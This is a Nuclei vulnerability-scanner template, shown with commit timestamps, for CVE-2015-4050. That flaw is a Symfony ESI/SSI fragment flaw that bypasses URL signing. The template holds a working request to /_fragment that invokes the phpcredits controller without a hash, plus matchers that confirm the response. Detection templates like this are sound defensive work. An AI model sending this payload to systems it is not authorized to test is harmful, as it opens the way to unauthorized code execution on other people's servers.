nuclei-templates/cves/2015/CVE-2015-4050.yaml

28 lines
948 B
YAML
Raw Normal View History

2021-08-30 13:49:02 +00:00
id: CVE-2015-4050
info:
2021-08-31 06:07:54 +00:00
name: ESI unauthorized access
2021-08-31 15:18:40 +00:00
author: ELSFA7110,meme-lord
2021-08-30 13:49:02 +00:00
severity: high
2021-08-31 15:18:40 +00:00
description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
2021-08-30 13:49:02 +00:00
tags: cve,cve2015,symfony,rce
2021-08-31 15:18:40 +00:00
reference:
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
2021-08-30 13:49:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Credits"
part: body
- type: status
status:
- 200